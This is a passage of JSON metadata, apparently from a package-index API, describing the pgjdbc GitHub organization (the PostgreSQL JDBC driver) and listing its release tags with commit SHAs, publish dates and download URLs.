reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pgjdbc","name":"Postgresql JDBC","uuid":"1371956","kind":"organization","description":"Official JDBC driver for PostgreSQL","email":"pgsql-jdbc@postgresql.org","website":"http://jdbc.postgresql.org","location":"Canada","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/1371956?v=4","repositories_count":12,"last_synced_at":"2025-05-18T13:01:52.520Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/pgjdbc","funding_links":[],"total_stars":2714,"followers":80,"following":0,"created_at":"2022-11-03T09:29:51.190Z","updated_at":"2025-05-18T13:01:52.520Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc/repositories"},"tags":[{"name":"REL42.7.10","sha":"27571c8e18712e7fc6a007bd38ab8e3d6c309c0c","kind":"commit","published_at":"2026-02-11T18:55:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10/manifests"},{"name":"REL42.7.9","sha":"79b784e3a63def9d12088471334399a53016d880","kind":"commit","published_at":"2026-01-15T18:02:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9/manifests"},{"name":"REL42.7.8","sha":"9a5492d99ce43507e318ce4bb56030f74b773d48","kind":"commit","published_at":"2025-09-18T21:10:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8/manifests"},{"name":"REL42.7.7","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T10:13:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7/manifests"},{"name":"REL42.7.7-rc1","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T09:56:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1/manifests"},{"name":"REL42.7.6","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:24:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6/manifests"},{"name":"REL42.7.6-rc1","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:13:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1/manifests"},{"name":"REL42.7.5","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T15:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5/manifests"},{"name":"REL42.7.5-rc1","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T14:58:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1/manifests"},{"name":"REL42.7.4","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T16:44:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4/manifests"},{"name":"REL42.7.4-rc1","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T14:09:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1/manifests"},{"name":"REL42.2.30-rc1","sha":"c6bbbc2ccc44cf099bf6b5973896a97636c5e32b","kind":"tag","published_at":"2024-04-09T12:32:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.30-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.30-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.30-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1/manifests"},{"name":"REL42.7.3","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:45:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3/manifests"},{"name":"REL42.7.3-rc1","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:42:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1/manifests"},{"name":"REL42.6.2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":"tag","published_at":"2024-03-13T18:57:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2/manifests"},{"name":"REL42.6.2-rc2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":"tag","published_at":"2024-03-13T18:57:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2/manifests"},{"name":"REL42.5.6","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:48:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6/manifests"},{"name":"REL42.5.6-rc1","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:46:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1/manifests"},{"name":"REL42.4.5","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-13T18:39:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5/manifests"},{"name":"REL42.3.10","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:33:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10/manifests"},{"name":"REL42.3.10-rc1","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:30:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1/manifests"},{"name":"REL42.2.29","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:27:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29/manifests"},{"name":"REL42.2.29-rc1","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:21:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1/manifests"},{"name":"REL42.4.5-rc1","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-08T14:02:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1/manifests"},{"name":"REL42.2.28","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:47:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28/manifests"},{"name":"REL42.2.28-rc1","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:45:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1/manifests"},{"name":"REL42.3.9","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9/manifests"},{"name":"REL42.3.9-rc1","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1/manifests"},{"name":"REL42.4.4","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4/manifests"},{"name":"REL42.4.4-rc1","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1/manifests"},{"name":"REL42.5.5","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:25:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5/manifests"},{"name":"REL42.5.5-rc1","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:24:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1/manifests"},{"name":"REL42.6.1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:16:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1/manifests"},{"name":"REL42.6.1-rc1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:15:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1/manifests"},{"name":"REL42.7.2-rc5","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T23:53:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5/manifests"},{"name":"REL42.7.2-rc4","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T16:35:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4/manifests"},{"name":"REL42.7.2-rc3","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:49:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3/manifests"},{"name":"REL42.7.2-rc2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:25:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2/manifests"},{"name":"REL42.7.2-rc1","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:10:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1/manifests"},{"name":"REL42.7.2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"commit","published_at":"2024-02-20T15:01:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2","t